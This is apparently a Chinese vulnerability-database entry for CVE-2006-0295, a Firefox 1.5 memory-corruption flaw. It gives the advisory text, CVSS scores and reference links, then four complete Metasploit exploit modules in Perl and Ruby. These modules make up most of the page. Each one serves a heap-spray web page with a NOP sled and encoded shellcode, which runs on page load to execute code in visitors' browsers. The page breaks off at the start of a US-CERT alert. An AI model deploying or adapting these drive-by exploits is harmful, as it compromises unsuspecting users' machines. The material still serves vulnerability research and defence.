CVE-2006-0295
CVSS5.1
发布时间 :2006-02-02 15:06:00
修订时间 :2011-03-07 21:29:44
NMCOEP    

[原文]Mozilla Firefox 1.5, Thunderbird 1.5 if Javascript is enabled in mail, and SeaMonkey before 1.0 might allow remote attackers to execute arbitrary code via the QueryInterface method of the built-in Location and Navigator objects, which leads to memory corruption.


[CNNVD]Mozilla Firefox多个远程安全漏洞(CNNVD-200602-037)

        Mozilla Firefox是一款非常流行的开源WEB浏览器。
        Mozilla Firefox实现上存在多个安全漏洞,远程攻击者可能利用此漏洞在用户系统上执行代码。
        Firefox JavaScript引擎的垃圾收集引擎对临时变量没有充分保护,远程攻击者可以通过恶意创建特定的对象导致内存破坏。
        远程攻击者可以创建动态改变一个对象的风格来触发内存访问错误,从而可能导致执行任意指令。
        远程攻击者可以在HTML文件中引用Location和Navigator对象内置的QueryInterface()方法触发内存访问错误,可能导致执行任意指令。XULDocument.persist()功能没有正确验证用户提交的属性名称,远程攻击者可能在localstore.rdf中注入XML数据,这些数据会在浏览器启动时被加载进来。
        E4X、SVG和Canvas功能存在整数溢出漏洞,远程攻击者可能利用此漏洞执行任意指令。
        XML解析器可能读取缓冲区以外的数据,从而导致浏览器崩溃。
        E4X功能的实现上错误地把内部的AnyName对象暴露给Web内容,两个协同的域名可能利用它来传递信息,从而破坏同源策略。

- CVSS (基础分值)

CVSS分值: 5.1 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: HIGH [漏洞利用存在特定的访问条件]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:mozilla:firefox:1.5Mozilla Firefox 1.5
cpe:/a:mozilla:thunderbird:1.5Mozilla Thunderbird 1.5
cpe:/a:mozilla:seamonkey:1.0:betaMozilla SeaMonkey 1.0 beta
cpe:/a:mozilla:seamonkey:1.0::alpha

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:1562Mozilla QueryInterface Memory Corruption Vulnerability
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0295
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-0295
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200602-037
(官方数据源) CNNVD

- 其它链接及资源

http://www.us-cert.gov/cas/techalerts/TA06-038A.html
(UNKNOWN)  CERT  TA06-038A
http://www.kb.cert.org/vuls/id/759273
(UNKNOWN)  CERT-VN  VU#759273
https://bugzilla.mozilla.org/show_bug.cgi?id=319296
(PATCH)  CONFIRM  https://bugzilla.mozilla.org/show_bug.cgi?id=319296
http://www.vupen.com/english/advisories/2006/3749
(UNKNOWN)  VUPEN  ADV-2006-3749
http://www.vupen.com/english/advisories/2006/0413
(UNKNOWN)  VUPEN  ADV-2006-0413
http://www.securityfocus.com/archive/1/archive/1/446657/100/200/threaded
(UNKNOWN)  HP  SSRT061236
http://xforce.iss.net/xforce/xfdb/24433
(UNKNOWN)  XF  mozilla-queryinterface-memory-corruption(24433)
http://www.securityfocus.com/bid/16476
(UNKNOWN)  BID  16476
http://www.securityfocus.com/archive/1/archive/1/446657/100/200/threaded
(UNKNOWN)  HP  HPSBUX02156
http://www.mozilla.org/security/announce/2006/mfsa2006-04.html
(UNKNOWN)  CONFIRM  http://www.mozilla.org/security/announce/2006/mfsa2006-04.html
http://securitytracker.com/id?1015570
(UNKNOWN)  SECTRACK  1015570
http://secunia.com/advisories/22065
(UNKNOWN)  SECUNIA  22065
http://secunia.com/advisories/18704
(UNKNOWN)  SECUNIA  18704
http://secunia.com/advisories/18700
(UNKNOWN)  SECUNIA  18700

- 漏洞信息

Mozilla Firefox多个远程安全漏洞
中危 资料不足
2006-02-02 00:00:00 2006-02-02 00:00:00
远程  
        Mozilla Firefox是一款非常流行的开源WEB浏览器。
        Mozilla Firefox实现上存在多个安全漏洞,远程攻击者可能利用此漏洞在用户系统上执行代码。
        Firefox JavaScript引擎的垃圾收集引擎对临时变量没有充分保护,远程攻击者可以通过恶意创建特定的对象导致内存破坏。
        远程攻击者可以创建动态改变一个对象的风格来触发内存访问错误,从而可能导致执行任意指令。
        远程攻击者可以在HTML文件中引用Location和Navigator对象内置的QueryInterface()方法触发内存访问错误,可能导致执行任意指令。XULDocument.persist()功能没有正确验证用户提交的属性名称,远程攻击者可能在localstore.rdf中注入XML数据,这些数据会在浏览器启动时被加载进来。
        E4X、SVG和Canvas功能存在整数溢出漏洞,远程攻击者可能利用此漏洞执行任意指令。
        XML解析器可能读取缓冲区以外的数据,从而导致浏览器崩溃。
        E4X功能的实现上错误地把内部的AnyName对象暴露给Web内容,两个协同的域名可能利用它来传递信息,从而破坏同源策略。

- 公告与补丁

        目前厂商已经在最新版本的软件中修复了这些安全问题,请到厂商的主页下载:
        http://www.mozilla.org

- 漏洞信息 (1474)

Mozilla Firefox 1.5 location.QueryInterface() Code Execution (linux) (EDBID:1474)
linux remote
2006-02-07 Verified
0 H D Moore
N/A [点击下载]
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::firefox_queryinterface_linux;

use strict;
use base "Msf::Exploit";
use Pex::Text;
use IO::Socket::INET;
use IPC::Open3;

my $advanced =
  {
	'Gzip'       => [1, 'Enable gzip content encoding'],
	'Chunked'    => [1, 'Enable chunked transfer encoding'],
  };
  
my $info =
  {
	'Name'           => 'Firefox location.QueryInterface() Code Execution (Linux x86)',
	'Version'        => '$Revision: 1.1 $',
	'Authors'        =>
	  [
		'H D Moore <hdm [at] metasploit.com>',
	  ],

	'Description'    =>
	  Pex::Text::Freeform(qq{
		This module exploits a code execution vulnerability in the Mozilla
	Firefox browser. To reliably exploit this vulnerability, we need to fill
	almost a gigabyte of memory with our nop sled and payload. This module has
	been tested on Gentoo Linux with the stock Firefox 1.5.0 package.
}),

	'Arch'           => [ 'x86' ],
	'OS'             => [ 'linux' ],
	'Priv'           => 0,

	'UserOpts'       =>
	  {
		'HTTPPORT' => [ 1, 'PORT', 'The local HTTP listener port', 8080      ],
		'HTTPHOST' => [ 0, 'HOST', 'The local HTTP listener host', "0.0.0.0" ],
	  },

	'Payload'        =>
	  {
		'Space'    => 1024,
		'BadChars' => "\x00",
		'Keys'     => ['-bind'],
	  },
	'Refs'           =>
	  [
	  	['CVE', '2006-0295'],
	  	['BID', '16476'],
	  	['URL', 'http://www.mozilla.org/security/announce/mfsa2006-04.html'],
	  ],

	'DefaultTarget'  => 0,
	'Targets'        =>
	  [
		[ 'Mozilla Firefox 1.5.0.0 on Linux x86' ]
	  ],
	
	'Keys'           => [ 'mozilla' ],

	'DisclosureDate' => 'Feb 02 2006',
  };

sub new {
	my $class = shift;
	my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
	return($self);
}

sub Exploit
{
	my $self = shift;
	my $server = IO::Socket::INET->new(
		LocalHost => $self->GetVar('HTTPHOST'),
		LocalPort => $self->GetVar('HTTPPORT'),
		ReuseAddr => 1,
		Listen    => 1,
		Proto     => 'tcp'
	);
	my $client;

	# Did the listener create fail?
	if (not defined($server)) {
		$self->PrintLine("[-] Failed to create local HTTP listener on " . $self->GetVar('HTTPPORT'));
		return;
	}

	my $httphost = ($self->GetVar('HTTPHOST') eq '0.0.0.0') ?
		Pex::Utils::SourceIP('1.2.3.4') :
		$self->GetVar('HTTPHOST');

	$self->PrintLine("[*] Waiting for connections to http://". $httphost .":". $self->GetVar('HTTPPORT') ."/");

	while (defined($client = $server->accept())) {
		$self->HandleHttpClient(Msf::Socket::Tcp->new_from_socket($client));
	}

	return;
}

sub HandleHttpClient
{
	my $self = shift;
	my $fd   = shift;

	# Set the remote host information
	my ($rport, $rhost) = ($fd->PeerPort, $fd->PeerAddr);
		

	# Read the HTTP command
	my ($cmd, $url, $proto) = split(/ /, $fd->RecvLine(10), 3);
	my $agent;
	
	# Read in the HTTP headers
	while ((my $line = $fd->RecvLine(10))) {
		
		$line =~ s/^\s+|\s+$//g;
		
		my ($var, $val) = split(/\:/, $line, 2);

		# Break out if we reach the end of the headers
		last if (not defined($var) or not defined($val));

		$agent = $val if $var =~ /User-Agent/i;
	}
	
	my $os = 'Unknown';
	my $vl = ($agent =~ m/\/1\.5$/) ? 'Vulnerable' : 'Not Vulnerable';
	
	$os = 'Linux'     if $agent =~ /Linux/i;
	$os = 'Mac OS X'  if $agent =~ /OS X/i;
	$os = 'Windows'   if $agent =~ /Windows/i;	
	
	
	$self->PrintLine("[*] Client connected from $rhost:$rport ($os/$vl).");
	
	if ($os ne 'Linux') {
		$self->PrintLine("[*] Invalid target for this exploit, trying anyways...");
	} else {
		$self->PrintLine("[*] Sending payload and waiting for execution...");	
	}

	my $res = $fd->Send($self->BuildResponse($self->GenerateHTML()));

	$fd->Close();
}


sub JSUnescape {
	my $self = shift;
	my $data = shift;
	my $code = '';
	
	# Encode the shellcode via %u sequences for JS's unescape() function
	my $idx = 0;
	while ($idx < length($data) - 1) {
		my $c1 = ord(substr($data, $idx, 1));
		my $c2 = ord(substr($data, $idx+1, 1));	
		$code .= sprintf('%%u%.2x%.2x', $c2, $c1);	
		$idx += 2;
	}
	
	return $code;
}

sub GenerateHTML {
	my $self        = shift;
	my $target      = $self->Targets->[$self->GetVar('TARGET')];
	my $shellcode   = $self->JSUnescape($self->GetVar('EncodedPayload')->Payload);
	my $data        = qq#
<html>
<head>
	<title>One second please...</title>
	<script language="javascript">

		function BodyOnLoad() {
			h = FillHeap();
			location.QueryInterface(eval("Components.interfaces.nsIClassInfo"));
		};
		
		function FillHeap() {
			// Filler
			var m = "";
			var h = "";
			var a = 0;
			
			// Nop sled
			for(a=0; a<(1024*512); a++)
				m += unescape("\%u9090");

			// Payload
			m += unescape("$shellcode");
			
			// Repeat
			for(a=0; a<1024; a++)
				h += m;
			
			// Return
			return h;
		}
	</script>
</head>
<body onload="BodyOnLoad()">
</body>
</html>
#;
	return $data;
}

sub BuildResponse {
	my ($self, $content) = @_;

	my $response =
	  "HTTP/1.1 200 OK\r\n" .
	  "Content-Type: text/html\r\n";

	if ($self->GetVar('Gzip')) {
		$response .= "Content-Encoding: gzip\r\n";
		$content = $self->Gzip($content);
	}
	if ($self->GetVar('Chunked')) {
		$response .= "Transfer-Encoding: chunked\r\n";
		$content = $self->Chunk($content);
	} else {
		$response .= 'Content-Length: ' . length($content) . "\r\n" .
		  "Connection: close\r\n";
	}

	$response .= "\r\n" . $content;

	return $response;
}

sub Chunk {
	my ($self, $content) = @_;

	my $chunked;
	while (length($content)) {
		my $chunk = substr($content, 0, int(rand(10) + 1), '');
		$chunked .= sprintf('%x', length($chunk)) . "\r\n$chunk\r\n";
	}
	$chunked .= "0\r\n\r\n";

	return $chunked;
}

sub Gzip {
	my $self = shift;
	my $data = shift;
	my $comp = int(rand(5))+5;

	my($wtr, $rdr, $err);

	my $pid = open3($wtr, $rdr, $err, 'gzip', '-'.$comp, '-c', '--force');
	print $wtr $data;
	close ($wtr);
	local $/;

	return (<$rdr>);
}
1;

# milw0rm.com [2006-02-07]
		

- 漏洞信息 (16301)

Firefox location.QueryInterface() Code Execution (EDBID:16301)
multiple remote
2010-09-20 Verified
0 metasploit
N/A [点击下载]
##
# $Id: firefox_queryinterface.rb 10394 2010-09-20 08:06:27Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = NormalRanking

	#
	# This module acts as an HTTP server
	#
	include Msf::Exploit::Remote::HttpServer::HTML

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Firefox location.QueryInterface() Code Execution',
			'Description'    => %q{
					This module exploits a code execution vulnerability in the Mozilla
				Firefox browser. To reliably exploit this vulnerability, we need to fill
				almost a gigabyte of memory with our nop sled and payload. This module has
				been tested on OS X 10.3 with the stock Firefox 1.5.0 package.
			},
			'License'        => MSF_LICENSE,
			'Author'         =>  ['hdm'],
			'Version'        => '$Revision: 10394 $',
			'References'     =>
				[
					['CVE', '2006-0295'],
					['OSVDB', '22893'],
					['BID', '16476'],
					['URL', 'http://www.mozilla.org/security/announce/mfsa2006-04.html'],
				],
			'Payload'        =>
				{
					'Space'    => 1000 + (rand(256).to_i * 4),
					'BadChars' => "\x00",
				},
			'Targets'        =>
				[
					[ 'Firefox 1.5.0.0 Mac OS X',
						{
							'Platform' => 'osx',
							'Arch' => ARCH_PPC
						}
					],

					[ 'Firefox 1.5.0.0 Linux',
						{
							'Platform' => 'linux',
							'Arch' => ARCH_X86,
						}
					],
				],
			'DisclosureDate' => 'Feb 02 2006'
			))
	end

	def on_request_uri(cli, request)

		# Re-generate the payload
		return if ((p = regenerate_payload(cli)) == nil)

		print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
		send_response_html(cli, generate_html(p), { 'Content-Type' => 'text/html' })
		handler(cli)
	end

	def generate_html(payload)

		enc_code = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
		enc_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(target.arch))

		return <<-EOF
<html>
<head>
<title>One second please...</title>
<script language="javascript">

function BodyOnLoad() {
	h = FillHeap();
	location.QueryInterface(eval("Components.interfaces.nsIClassInfo"));
};

function FillHeap() {
	// Filler
	var m = "";
	var h = "";
	var a = 0;
	
	// Nop sled
	for(a=0; a<(1024*256); a++)
		m += unescape("#{enc_nops}");
		
	// Payload
	m += unescape("#{enc_code}");
	
	// Repeat
	for(a=0; a<1024; a++)
		h += m;
		
	// Return
	return h;
}
</script>
</head>
<body onload="BodyOnLoad()">
</body>
</html>
EOF
	end

end
		

- 漏洞信息 (F82259)

Firefox location.QueryInterface() Code Execution (PacketStormID:F82259)
2009-10-27 00:00:00
H D Moore  metasploit.com
exploit,code execution
apple,osx
CVE-2006-0295
[点击下载]

This Metasploit module exploits a code execution vulnerability in the Mozilla Firefox browser. To reliably exploit this vulnerability, we need to fill almost a gigabyte of memory with our nop sled and payload. This module has been tested on OS X 10.3 with the stock Firefox 1.5.0 package.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	#
	# This module acts as an HTTP server
	#
	include Msf::Exploit::Remote::HttpServer::HTML

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Firefox location.QueryInterface() Code Execution',
			'Description'    => %q{
				This module exploits a code execution vulnerability in the Mozilla
			Firefox browser. To reliably exploit this vulnerability, we need to fill
			almost a gigabyte of memory with our nop sled and payload. This module has
			been tested on OS X 10.3 with the stock Firefox 1.5.0 package.

			},
			'License'        => MSF_LICENSE,
			'Author'         =>  ['hdm'],
			'Version'        => '$Revision$',
			'References'     => 
				[
					['CVE', '2006-0295'],
					['OSVDB', '22893'],
					['BID', '16476'],
					['URL', 'http://www.mozilla.org/security/announce/mfsa2006-04.html'],
				],
			'Payload'        =>
				{
					'Space'    => 1000 + (rand(256).to_i * 4),
					'BadChars' => "\x00",
				},
			'Targets'        =>
				[
					[ 'Firefox 1.5.0.0 Mac OS X', 
						{
							'Platform' => 'osx',
							'Arch' => ARCH_PPC 
						}
					],

					[ 'Firefox 1.5.0.0 Linux', 
						{
							'Platform' => 'linux',
							'Arch' => ARCH_X86, 
						}
					],
				],
			'DisclosureDate' => 'Feb 02 2006'
			))
	end

	def on_request_uri(cli, request)
	
		# Re-generate the payload
		return if ((p = regenerate_payload(cli)) == nil)

		print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
		send_response_html(cli, generate_html(p), { 'Content-Type' => 'text/html' })
		handler(cli)
	end
	
	def generate_html(payload)

		enc_code = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
		enc_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(target.arch))

		return %Q|
<html>
<head>
        <title>One second please...</title>
        <script language="javascript">

                function BodyOnLoad() {
                        h = FillHeap();
                        location.QueryInterface(eval("Components.interfaces.nsIClassInfo"));
                };

                function FillHeap() {
                        // Filler
                        var m = "";
                        var h = "";
                        var a = 0;

                        // Nop sled
                        for(a=0; a<(1024*256); a++)
                                m += unescape("#{enc_nops}");

                        // Payload
                        m += unescape("#{enc_code}");

                        // Repeat
                        for(a=0; a<1024; a++)
                                h += m;

                        // Return
                        return h;
                }
        </script>
</head>
<body onload="BodyOnLoad()">
</body>
</html>
		|
	end

end

    

- 漏洞信息 (F43818)

firefox_queryinterface_mac.pm.txt (PacketStormID:F43818)
2006-02-14 00:00:00
H D Moore  metasploit.com
exploit,remote
apple,osx
CVE-2006-0295
[点击下载]

Mozilla Firefox versions 1.5 and below remote command execution interface that makes use of location.QueryInterface(). Max OS X version.

##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::firefox_queryinterface_osx;

use strict;
use base "Msf::Exploit";
use Pex::Text;
use IO::Socket::INET;
use IPC::Open3;

my $advanced =
{
'Gzip' => [1, 'Enable gzip content encoding'],
'Chunked' => [1, 'Enable chunked transfer encoding'],
};

my $info =
{
'Name' => 'Firefox location.QueryInterface() Code Execution (Mac OS X)',
'Version' => '$Revision: 1.1 $',
'Authors' =>
[
'H D Moore <hdm [at] metasploit.com>',
],

'Description' =>
Pex::Text::Freeform(qq{
This module exploits a code execution vulnerability in the Mozilla
Firefox browser. To reliably exploit this vulnerability, we need to fill
almost a gigabyte of memory with our nop sled and payload. This module has
been tested on OS X 10.3 with the stock Firefox 1.5.0 package.
}),

'Arch' => [ 'ppc' ],
'OS' => [ 'osx' ],
'Priv' => 0,

'UserOpts' =>
{
'HTTPPORT' => [ 1, 'PORT', 'The local HTTP listener port', 8080 ],
'HTTPHOST' => [ 0, 'HOST', 'The local HTTP listener host', "0.0.0.0" ],
},

'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00",
'Keys' => ['-bind'],
},
'Refs' =>
[
['CVE', '2006-0295'],
['BID', '16476'],
['URL', 'http://www.mozilla.org/security/announce/mfsa2006-04.html'],
],

'DefaultTarget' => 0,
'Targets' =>
[
[ 'Mozilla Firefox 1.5.0.0 on Mac OS X' ]
],

'Keys' => [ 'mozilla' ],

'DisclosureDate' => 'Feb 02 2006',
};

sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}

sub Exploit
{
my $self = shift;
my $server = IO::Socket::INET->new(
LocalHost => $self->GetVar('HTTPHOST'),
LocalPort => $self->GetVar('HTTPPORT'),
ReuseAddr => 1,
Listen => 1,
Proto => 'tcp'
);
my $client;

# Did the listener create fail?
if (not defined($server)) {
$self->PrintLine("[-] Failed to create local HTTP listener on " . $self->GetVar('HTTPPORT'));
return;
}

my $httphost = ($self->GetVar('HTTPHOST') eq '0.0.0.0') ?
Pex::Utils::SourceIP('1.2.3.4') :
$self->GetVar('HTTPHOST');

$self->PrintLine("[*] Waiting for connections to http://". $httphost .":". $self->GetVar('HTTPPORT') ."/");

while (defined($client = $server->accept())) {
$self->HandleHttpClient(Msf::Socket::Tcp->new_from_socket($client));
}

return;
}

sub HandleHttpClient
{
my $self = shift;
my $fd = shift;

# Set the remote host information
my ($rport, $rhost) = ($fd->PeerPort, $fd->PeerAddr);


# Read the HTTP command
my ($cmd, $url, $proto) = split(/ /, $fd->RecvLine(10), 3);
my $agent;

# Read in the HTTP headers
while ((my $line = $fd->RecvLine(10))) {

$line =~ s/^\s+|\s+$//g;

my ($var, $val) = split(/\:/, $line, 2);

# Break out if we reach the end of the headers
last if (not defined($var) or not defined($val));

$agent = $val if $var =~ /User-Agent/i;
}

my $os = 'Unknown';
my $vl = ($agent =~ m/\/1\.5$/) ? 'Vulnerable' : 'Not Vulnerable';

$os = 'Linux' if $agent =~ /Linux/i;
$os = 'Mac OS X' if $agent =~ /OS X/i;
$os = 'Windows' if $agent =~ /Windows/i; 


$self->PrintLine("[*] Client connected from $rhost:$rport ($os/$vl).");

if ($os ne 'Mac OS X') {
$self->PrintLine("[*] Invalid target for this exploit, trying anyways...");
} else {
$self->PrintLine("[*] Sending payload and waiting for execution..."); 
}

my $res = $fd->Send($self->BuildResponse($self->GenerateHTML()));

$fd->Close();
}

sub JSUnescapePPC {
my $self = shift;
my $data = shift;
my $code = '';

# Encode the shellcode via %u sequences for JS's unescape() function
my $idx = 0;
while ($idx < length($data) - 1) {
my $c1 = ord(substr($data, $idx, 1));
my $c2 = ord(substr($data, $idx+1, 1)); 
$code .= sprintf('%%u%.2x%.2x', $c1, $c2); 
$idx += 2;
}

return $code;
}

sub GenerateHTML {
my $self = shift;
my $target = $self->Targets->[$self->GetVar('TARGET')];
my $shellcode = $self->JSUnescapePPC($self->GetVar('EncodedPayload')->Payload);
my $data = qq#
<html>
<head>
<title>One second please...</title>
<script language="javascript">

function BodyOnLoad() {
h = FillHeap();
location.QueryInterface(eval("Components.interfaces.nsIClassInfo"));
};

function FillHeap() {
// Filler
var m = "";
var h = "";
var a = 0;

// Nop sled
for(a=0; a<(1024*256); a++)
m += unescape("\%u6060\%u6060");

// Payload
m += unescape("$shellcode");

// Repeat
for(a=0; a<1024; a++)
h += m;

// Return
return h;
}
</script>
</head>
<body onload="BodyOnLoad()">
</body>
</html>
#;
return $data;
}

sub BuildResponse {
my ($self, $content) = @_;

my $response =
"HTTP/1.1 200 OK\r\n" .
"Content-Type: text/html\r\n";

if ($self->GetVar('Gzip')) {
$response .= "Content-Encoding: gzip\r\n";
$content = $self->Gzip($content);
}
if ($self->GetVar('Chunked')) {
$response .= "Transfer-Encoding: chunked\r\n";
$content = $self->Chunk($content);
} else {
$response .= 'Content-Length: ' . length($content) . "\r\n" .
"Connection: close\r\n";
}

$response .= "\r\n" . $content;

return $response;
}

sub Chunk {
my ($self, $content) = @_;

my $chunked;
while (length($content)) {
my $chunk = substr($content, 0, int(rand(10) + 1), '');
$chunked .= sprintf('%x', length($chunk)) . "\r\n$chunk\r\n";
}
$chunked .= "0\r\n\r\n";

return $chunked;
}

sub Gzip {
my $self = shift;
my $data = shift;
my $comp = int(rand(5))+5;

my($wtr, $rdr, $err);

my $pid = open3($wtr, $rdr, $err, 'gzip', '-'.$comp, '-c', '--force');
print $wtr $data;
close ($wtr);
local $/;

return (<$rdr>);
}

1;

    

- 漏洞信息 (F43816)

firefox_queryinterface.pm.txt (PacketStormID:F43816)
2006-02-14 00:00:00
H D Moore  metasploit.com
exploit,remote
CVE-2006-0295
[点击下载]

Mozilla Firefox versions 1.5 and below remote command execution interface that makes use of location.QueryInterface().

##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::firefox_queryinterface_linux;

use strict;
use base "Msf::Exploit";
use Pex::Text;
use IO::Socket::INET;
use IPC::Open3;

my $advanced =
{
'Gzip' => [1, 'Enable gzip content encoding'],
'Chunked' => [1, 'Enable chunked transfer encoding'],
};

my $info =
{
'Name' => 'Firefox location.QueryInterface() Code Execution (Linux x86)',
'Version' => '$Revision: 1.1 $',
'Authors' =>
[
'H D Moore <hdm [at] metasploit.com>',
],

'Description' =>
Pex::Text::Freeform(qq{
This module exploits a code execution vulnerability in the Mozilla
Firefox browser. To reliably exploit this vulnerability, we need to fill
almost a gigabyte of memory with our nop sled and payload. This module has
been tested on Gentoo Linux with the stock Firefox 1.5.0 package.
}),

'Arch' => [ 'x86' ],
'OS' => [ 'linux' ],
'Priv' => 0,

'UserOpts' =>
{
'HTTPPORT' => [ 1, 'PORT', 'The local HTTP listener port', 8080 ],
'HTTPHOST' => [ 0, 'HOST', 'The local HTTP listener host', "0.0.0.0" ],
},

'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00",
'Keys' => ['-bind'],
},
'Refs' =>
[
['CVE', '2006-0295'],
['BID', '16476'],
['URL', 'http://www.mozilla.org/security/announce/mfsa2006-04.html'],
],

'DefaultTarget' => 0,
'Targets' =>
[
[ 'Mozilla Firefox 1.5.0.0 on Linux x86' ]
],

'Keys' => [ 'mozilla' ],

'DisclosureDate' => 'Feb 02 2006',
};

sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}

sub Exploit
{
my $self = shift;
my $server = IO::Socket::INET->new(
LocalHost => $self->GetVar('HTTPHOST'),
LocalPort => $self->GetVar('HTTPPORT'),
ReuseAddr => 1,
Listen => 1,
Proto => 'tcp'
);
my $client;

# Did the listener create fail?
if (not defined($server)) {
$self->PrintLine("[-] Failed to create local HTTP listener on " . $self->GetVar('HTTPPORT'));
return;
}

my $httphost = ($self->GetVar('HTTPHOST') eq '0.0.0.0') ?
Pex::Utils::SourceIP('1.2.3.4') :
$self->GetVar('HTTPHOST');

$self->PrintLine("[*] Waiting for connections to http://". $httphost .":". $self->GetVar('HTTPPORT') ."/");

while (defined($client = $server->accept())) {
$self->HandleHttpClient(Msf::Socket::Tcp->new_from_socket($client));
}

return;
}

sub HandleHttpClient
{
my $self = shift;
my $fd = shift;

# Set the remote host information
my ($rport, $rhost) = ($fd->PeerPort, $fd->PeerAddr);


# Read the HTTP command
my ($cmd, $url, $proto) = split(/ /, $fd->RecvLine(10), 3);
my $agent;

# Read in the HTTP headers
while ((my $line = $fd->RecvLine(10))) {

$line =~ s/^\s+|\s+$//g;

my ($var, $val) = split(/\:/, $line, 2);

# Break out if we reach the end of the headers
last if (not defined($var) or not defined($val));

$agent = $val if $var =~ /User-Agent/i;
}

my $os = 'Unknown';
my $vl = ($agent =~ m/\/1\.5$/) ? 'Vulnerable' : 'Not Vulnerable';

$os = 'Linux' if $agent =~ /Linux/i;
$os = 'Mac OS X' if $agent =~ /OS X/i;
$os = 'Windows' if $agent =~ /Windows/i; 


$self->PrintLine("[*] Client connected from $rhost:$rport ($os/$vl).");

if ($os ne 'Linux') {
$self->PrintLine("[*] Invalid target for this exploit, trying anyways...");
} else {
$self->PrintLine("[*] Sending payload and waiting for execution..."); 
}

my $res = $fd->Send($self->BuildResponse($self->GenerateHTML()));

$fd->Close();
}


sub JSUnescape {
my $self = shift;
my $data = shift;
my $code = '';

# Encode the shellcode via %u sequences for JS's unescape() function
my $idx = 0;
while ($idx < length($data) - 1) {
my $c1 = ord(substr($data, $idx, 1));
my $c2 = ord(substr($data, $idx+1, 1)); 
$code .= sprintf('%%u%.2x%.2x', $c2, $c1); 
$idx += 2;
}

return $code;
}

sub GenerateHTML {
my $self = shift;
my $target = $self->Targets->[$self->GetVar('TARGET')];
my $shellcode = $self->JSUnescape($self->GetVar('EncodedPayload')->Payload);
my $data = qq#
<html>
<head>
<title>One second please...</title>
<script language="javascript">

function BodyOnLoad() {
h = FillHeap();
location.QueryInterface(eval("Components.interfaces.nsIClassInfo"));
};

function FillHeap() {
// Filler
var m = "";
var h = "";
var a = 0;

// Nop sled
for(a=0; a<(1024*512); a++)
m += unescape("\%u9090");

// Payload
m += unescape("$shellcode");

// Repeat
for(a=0; a<1024; a++)
h += m;

// Return
return h;
}
</script>
</head>
<body onload="BodyOnLoad()">
</body>
</html>
#;
return $data;
}

sub BuildResponse {
my ($self, $content) = @_;

my $response =
"HTTP/1.1 200 OK\r\n" .
"Content-Type: text/html\r\n";

if ($self->GetVar('Gzip')) {
$response .= "Content-Encoding: gzip\r\n";
$content = $self->Gzip($content);
}
if ($self->GetVar('Chunked')) {
$response .= "Transfer-Encoding: chunked\r\n";
$content = $self->Chunk($content);
} else {
$response .= 'Content-Length: ' . length($content) . "\r\n" .
"Connection: close\r\n";
}

$response .= "\r\n" . $content;

return $response;
}

sub Chunk {
my ($self, $content) = @_;

my $chunked;
while (length($content)) {
my $chunk = substr($content, 0, int(rand(10) + 1), '');
$chunked .= sprintf('%x', length($chunk)) . "\r\n$chunk\r\n";
}
$chunked .= "0\r\n\r\n";

return $chunked;
}

sub Gzip {
my $self = shift;
my $data = shift;
my $comp = int(rand(5))+5;

my($wtr, $rdr, $err);

my $pid = open3($wtr, $rdr, $err, 'gzip', '-'.$comp, '-c', '--force');
print $wtr $data;
close ($wtr);
local $/;

return (<$rdr>);
}
1;
    

- 漏洞信息 (F43644)

Technical Cyber Security Alert 2006-38A (PacketStormID:F43644)
2006-02-08 00:00:00
US-CERT  kb.cert.org
advisory,remote,web,arbitrary,vulnerability
CVE-2006-0296,CVE-2006-0295
[点击下载]

Several vulnerabilities exist in the Mozilla web browser and derived products, the most serious of which could allow a remote attacker to execute arbitrary code on an affected system. Version of Mozilla Firefox below 1.5.0.1 and versions of SeaMonkey below 1.0 are affected.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1



                        National Cyber Alert System

                 Technical Cyber Security Alert TA06-038A


Multiple Vulnerabilities in Mozilla Products

   Original release date: February 7, 2006
   Last revised: --
   Source: US-CERT


Systems Affected

   Mozilla software, including the following, is affected:
